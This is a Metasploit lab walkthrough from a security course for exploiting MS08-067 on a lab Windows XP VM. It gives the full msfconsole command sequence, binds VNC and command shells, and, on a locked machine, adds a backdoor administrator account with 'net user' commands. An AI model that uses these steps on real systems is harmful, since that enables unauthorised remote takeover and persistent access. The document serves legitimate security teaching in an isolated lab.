ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploit >> Current Page |Views: 39380

(Metasploit: MS08-067)

{ Establishing A VNCShell To The Vulnerable Machine }


0. Background Information
  1. http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
    • The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit.
    • Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.

 

1. Prerequisite
  1. Login to your WindowsVulnerable VM, as username instructor
    • For those of you that are not part of this class, this is a Windows XP machines that is vulnerable to the MS08-067 Vulnerability.

     

  2. On WindowsVulnerable01, obtain the IP Address.
    • START --> run --> cmd --> ifconfig
    • In my case, WindowsVulnerable01's IP Address 192.168.1.108.

     

  3. Login to your Backtrack01 VM, as username root

     

  4. startx
    • Issue the startx command if you are currently are only seeing a console and not a graphical user interface.

 

2. Confirm Backtrack01 has an IP Address
  1. Fire up a console or terminal window
    • System --> Konsole

     

  2. ifconfig
    • Example:  No IP Address for eth0
      • If a valid IP address for eth0 is not displayed please move onto step 3.

       

    • Example: Valid IP Address for eth0

       

  3. vi /etc/network/interfaces

     

  4. Your file should look similar to the below screen shot

     

  5. cd /etc/init.d/

     

  6. ./networking start

     

  7. Confirm you have a valid IP address for eth0
    • In my case, eth0's IP address is 192.168.1.107.

 

3. Stop Firewall on Backtrack01
  1. Start Firestarter
    • System --> Firestarter

     

  2. Click on Stop Firewall

 

5. Starting up the Metasploit MSF Console
  1. Fire up the MSF Console (See Below)
    • Note It might take a while to start.

     

  2. Once MSF Loads (See Below)

 

6. Searching For Exploits
  1. search ms08_067 (See Below)
    • Below we are searching for any exploits involving Microsoft Advisory MS08-067.
    • Only one exploit is returned (windows/smb/ms08_067_netapi)

 

7. Using an exploit
  1. use windows/smb/ms08_067_netapi

 

8. Selecting a Payload
  1. show payloads

     

  2. Look for windows/vncinject/bind_tcp
    • Each name is followed by a brief description

     

  3. set PAYLOAD windows/vncinject/bind_tcp

     

  4. show options
    • Notice the Required Column.  RPORT and SMBPIPE are already populated, but RHOST is not.
    • You will populate RHOST with the IP Address of WindowsVulnerable01.

     

  5. set RHOST 192.168.1.112
    • Note: Use the IP Address of WindowsVulnerable01

 

9. Exploit a windows machine that is "not" locked
  1. exploit

     

  2. Presto, The VNC Server is open and a VNC client session with a remote command shell will be launched shortly.

     

  3. VNC Shell Session
    • Proof of Lab:
      • From the remote command shell, type date and press enter twice.
      • Do a PrtScn, Cut and Paste into a word document, and Upload to Moodle.

     

  4. Close VNC Shell

 

 

10. Exploit a "locked" windows machine

 

  1. Make sure the WindowsVulnerable01 is locked.
    • Remember for VMware you cannot just simple press Ctrl+Alt+Del you can from a typical Windows client.

     

    • Remember to Click on the Lock Computer Button.

     

    • Verify WindowsVulnerable01 is locked.

     

  2. Fire up the MSF Console (See Below)
    • Note It might take a while to start.

     

  3. Once MSF Loads (See Below)

     

  4. search ms08_067 (See Below)
    • Below we are searching for any exploits involving Microsoft Advisory MS08-067.
    • Only one exploit is returned (windows/smb/ms08_067_netapi)

     

  1. show payloads

     

  2. Look for windows/vncinject/bind_tcp
    • Each name is followed by a brief description

     

  3. set PAYLOAD windows/shell_bind_tcp

     

  4. show options
    • Notice the Required Column.  RPORT and SMBPIPE are already populated, but RHOST is not.
    • You will populate RHOST with the IP Address of WindowsVulnerable01.

     

  5. set RHOST 192.168.1.112
    • Note: Use the IP Address of WindowsVulnerable01

     

  6. exploit

     

  7. In the Metasploit Courtesy Shell, create a user and add to groups (See Below)
    • Command: net user hacker33 abc123 /add
      • Username: hacker33
      • Password: abc123

     

    • Command: net localgroup administrator hacker33 /add
      • Add username hacker33 to the groups localgroup and administrator

       

     

  8. Minimize the Metasploit Courtesy Shell (See Below)
    • Click the minimize button.

     

  9. Login user your newly created username (hacker33) and password (abc123)
    • Note: At the very bottom of the screen you will see minimized command shell prompt.

     

  10. Select OK (See Below)

     

  11. Now login again as user hacker with password abc123.
    • Note: If you cannot get in, or your screen hangs, go to step 15.

     

  12. Close the VNCShell Windows, by click on the Red X, then clicking Close.

     

  13. Go back to your previous MSF prompt.
    • Press Enter to see MSF Prompt
    • The Press the up arrow, which will prompt the word exploit.
    • Press enter.

     

  14. Shazam. You are in.

 

Proof of Lab
  1. Cut and Paste a screen shot that looks similar to Step #3 in Section 9 into a word document and upload to Moodle.

 

 



Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth